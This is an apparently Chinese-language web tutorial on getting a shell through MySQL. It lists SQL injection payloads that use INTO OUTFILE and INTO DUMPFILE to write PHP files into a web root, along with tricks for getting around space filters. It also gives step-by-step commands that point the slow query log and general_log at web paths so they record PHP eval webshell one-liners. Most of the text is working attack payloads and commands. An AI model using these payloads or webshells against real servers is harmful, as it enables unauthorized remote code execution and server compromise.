outfile和dumpfile寫shell

利用條件

• 數(shù)據(jù)庫(kù)當(dāng)前用戶為root權(quán)限；
• 知道當(dāng)前網(wǎng)站的絕對(duì)路徑；
• PHP的GPC為 off狀態(tài)；(魔術(shù)引號(hào)，GET，POST，Cookie)
• 寫入的那個(gè)路徑存在寫入權(quán)限。

基于union聯(lián)合查詢：

?id=1 union select 1,'<?php phpinfo();?>',3 into outfile 'C:\phpstudy\www\shell.php'%23
?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile 'C:\phpstudy\www\shell.php'%23

非聯(lián)合查詢

當(dāng)我們無(wú)法使用聯(lián)合查詢時(shí)，我們可以使用fields terminated by與lines terminated by來(lái)寫shell

?id=1 into outfile 'C:\phpstudy\www\shell.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23

代替空格的方法

+號(hào)，%0a、%0b、%a0 、 /**/ 注釋符等

outfile和dumpfile的區(qū)別

outfile:

1、 支持多行數(shù)據(jù)同時(shí)導(dǎo)出

2、 使用union聯(lián)合查詢時(shí)，要保證兩側(cè)查詢的列數(shù)相同

3、 會(huì)在換行符制表符后面追加反斜杠

4、會(huì)在末尾追加換行

dumpfile:

1、 每次只能導(dǎo)出一行數(shù)據(jù)

2、 不會(huì)在換行符制表符后面追加反斜杠

3、 不會(huì)在末尾追加換行

因此，我們可以使用into dumpfile這個(gè)函數(shù)來(lái)順利寫入二進(jìn)制文件;

當(dāng)然into outfile函數(shù)也可以寫入二進(jìn)制文件，但是無(wú)法生效（追加的反斜杠會(huì)使二進(jìn)制文件無(wú)法生效）

當(dāng)我們使用dumpfile，應(yīng)該手動(dòng)添加 limit 限制，來(lái)獲取不同的行數(shù)

secure_file_prive

MySQL的secure-file-prive參數(shù)是用來(lái)限制LOAD DATA, SELECT ,OUTFILE, and LOAD_FILE()傳到哪個(gè)指定目錄的。

secure_file_prive= ，結(jié)果為空的話，表示允許任何文件讀寫

secure_file_prive=NULL，表示不允許任何文件讀寫

secure_file_prive=‘某個(gè)路徑’，表示這個(gè)路徑作為文件讀寫的路徑

在mysql5.5版本前，都是默認(rèn)為空，允許讀取

在mysql5.6版本后 ,默認(rèn)為NULL，并且無(wú)法用SQL語(yǔ)句對(duì)其進(jìn)行修改。所以這種只能在配置進(jìn)行修改。

查詢secure_file_prive的參數(shù)

show global variables like "%secure%"

利用sql語(yǔ)句修改參數(shù)

set global secure_file_prive= 

但是5.6后不能利用sql修改了，所以只能利用配置修改

修改value的值：
windows下修改配置文件：mysql.ini
linux修改配置文件：my.cnf

日志getshell

慢日志getshell

慢日志：

一般都是通過long_query_time選項(xiàng)來(lái)設(shè)置這個(gè)時(shí)間值，時(shí)間以秒為單位，可以精確到微秒。如果查詢時(shí)間超過了這個(gè)時(shí)間值（默認(rèn)為10秒），這個(gè)查詢語(yǔ)句將被記錄到慢查詢?nèi)罩局?。查看服?wù)器默認(rèn)時(shí)間值方式如下：

show global variables like '%long_query_time%'
show global variables like '%long%'

查看慢日志參數(shù)

show global variables like '%slow%'

對(duì)慢日志參數(shù)進(jìn)行修改

set global slow_query_log=1 #打開慢日志
set global slow_query_log_file='c:\\phpstudy\\www\\test.php'#慢日志的路徑
注意：一定要用雙反斜杠
SELECT '<?php @eval($_POST[1]);?>' or sleep(11)
這兒11是超過慢日志的10秒時(shí)間

利用general_log

利用general_log，可以將所有到達(dá)mysql服務(wù)器的sql語(yǔ)句，都記錄下來(lái)。

相關(guān)參數(shù)一共有3個(gè)：general_log、log_output、general_log_file

show variables like 'general_log';  -- 查看日志是否開啟
set global general_log=on; -- 開啟日志功能


show variables like 'general_log_file';  -- 看看日志文件保存位置
set global general_log_file='tmp/general.lg'; -- 設(shè)置日志文件保存位置


show variables like 'log_output';  -- 看看日志輸出類型  table或file
set global log_output='table'; -- 設(shè)置輸出類型為 table
set global log_output='file';   -- 設(shè)置輸出類型為file

一般log_output都是file,就是將日志存入文件中。table的話就是將日志存入數(shù)據(jù)庫(kù)的日志表中。

getshell

set global general_log=on
set global general_log_file='需要攻擊的路徑'
select '<?php eval($_POST[cmd]);?>'

這樣就將一句話木馬記錄到general_log中，從而getshell

binlog的介紹

可以看看這個(gè)

總結(jié)

到此這篇關(guān)于mysql數(shù)據(jù)庫(kù)中g(shù)etshell方式的文章就介紹到這了,更多相關(guān)mysql getshell的方式內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

最新評(píng)論